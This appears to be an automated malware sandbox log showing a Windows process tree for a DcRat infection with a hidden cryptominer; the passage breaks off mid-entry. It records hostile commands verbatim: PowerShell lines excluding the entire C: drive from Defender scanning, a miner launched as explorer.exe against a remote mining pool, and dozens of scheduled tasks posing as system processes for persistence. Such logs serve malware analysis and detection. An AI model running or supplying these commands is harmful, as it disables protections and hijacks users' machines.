                                                                                                                    powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                    8⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:3544
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1832
                                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                                    "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                    8⤵
                                                                                                                      PID:5820
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                                                                                                    7⤵
                                                                                                                      PID:5480
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3500
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                                                                                                              3⤵
                                                                                                                PID:1972
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                                                                                                                  4⤵
                                                                                                                    PID:6004
                                                                                                                    • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                      "C:\DriversavessessionDlldhcp/Roblox.exe"
                                                                                                                      5⤵
                                                                                                                      • Modifies WinLogon for persistence
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Modifies registry class
                                                                                                                      PID:2072
                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oza3vr0v\oza3vr0v.cmdline"
                                                                                                                        6⤵
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:5980
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3563.tmp" "c:\Windows\security\database\CSCD83EB11C8955475DBA43DCED9A448C3C.TMP"
                                                                                                                          7⤵
                                                                                                                            PID:5856
                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bmvwq502\bmvwq502.cmdline"
                                                                                                                          6⤵
                                                                                                                            PID:5660
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3709.tmp" "c:\winNet\CSCB7B2ADF66FCA4E8C9EE0DF1955445DDB.TMP"
                                                                                                                              7⤵
                                                                                                                                PID:3264
                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f2brxcpv\f2brxcpv.cmdline"
                                                                                                                              6⤵
                                                                                                                                PID:5636
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37D4.tmp" "c:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\CSC63118D1DC1024AF1BF9977F545F46D39.TMP"
                                                                                                                                  7⤵
                                                                                                                                    PID:6008
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\adbwbwp4\adbwbwp4.cmdline"
                                                                                                                                  6⤵
                                                                                                                                    PID:3088
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES389F.tmp" "c:\DriversavessessionDlldhcp\CSCAE70B349390D4DFDA770466575C77BFA.TMP"
                                                                                                                                      7⤵
                                                                                                                                        PID:1144
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vg04ngxu\vg04ngxu.cmdline"
                                                                                                                                      6⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      PID:3936
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES397A.tmp" "c:\Windows\Migration\CSCE7BCA4546D6B4965AD1BAE6EDF2479A7.TMP"
                                                                                                                                        7⤵
                                                                                                                                          PID:2016
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\myvoeldw\myvoeldw.cmdline"
                                                                                                                                        6⤵
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:3124
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3A45.tmp" "c:\Program Files\Windows Sidebar\Gadgets\CSC62A6B72159B7431CB23C13415B76C567.TMP"
                                                                                                                                          7⤵
                                                                                                                                            PID:4060
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rtn0fauv\rtn0fauv.cmdline"
                                                                                                                                          6⤵
                                                                                                                                            PID:6036
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES467A.tmp" "c:\Program Files (x86)\Windows Photo Viewer\en-US\CSCF98217D13B1D4EAFB2FB8CD39131A9AC.TMP"
                                                                                                                                              7⤵
                                                                                                                                                PID:2784
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pw2infla\pw2infla.cmdline"
                                                                                                                                              6⤵
                                                                                                                                                PID:4808
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES488D.tmp" "c:\winNet\CSC4C5E612632B74DCFAA146338F7C6DFEF.TMP"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:5840
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e5pvzrpo\e5pvzrpo.cmdline"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4952
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C17.tmp" "c:\Program Files\Windows NT\Accessories\en-US\CSC317492395941434B99D257C756B9AB69.TMP"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:104
                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhylqmpt\mhylqmpt.cmdline"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:5280
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5270.tmp" "c:\Program Files (x86)\Internet Explorer\SIGNUP\CSC966A093FB64E446AB5D559826060E065.TMP"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5908
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jjqyoqpn\jjqyoqpn.cmdline"
                                                                                                                                                          6⤵
                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                          PID:5516
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5678.tmp" "c:\Windows\System32\CSC9083A010E69947F896FE603A096176C.TMP"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5912
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5012
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:1764
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:128
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:3288
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:3152
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5712
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:1096
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5740
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4752
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:420
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4880
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5548
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:4608
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\RuntimeBroker.exe'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5512
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:5632
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2TSoQ2E8cZ.bat"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:4892
                                                                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                                                                chcp 65001
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:1628
                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                  ping -n 10 localhost
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:5780
                                                                                                                                                                • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                                                                                                                  "C:\DriversavessessionDlldhcp\Roblox.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                  PID:3408
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3056
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4100
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3172
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\addins\csrss.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3152
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1020
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Windows\addins\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2076
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1344
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3736
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\dwm.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4692
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4980
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3160
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:5048
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\security\database\conhost.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3368
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\security\database\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3544
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\security\database\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3420
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3516
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "SolaraBootstrapper" /sc ONLOGON /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1300
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "SolaraBootstrapperS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\SolaraBootstrapper.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1436
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 6 /tr "'C:\Users\Default\My Documents\sysmon.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4924
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Users\Default\My Documents\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:912
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 5 /tr "'C:\Users\Default\My Documents\sysmon.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1624
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2040
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4332
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4748
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\winNet\Registry.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:4612
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:1036
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\winNet\Registry.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2832
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Users\Default User\csrss.exe'" /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:3164
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:2440
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                      schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                      1⤵
                                                                                                                                                      • DcRat
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                      PID:756
                                                                                                                                                    • C:\Windows\system32\schtasks.exe
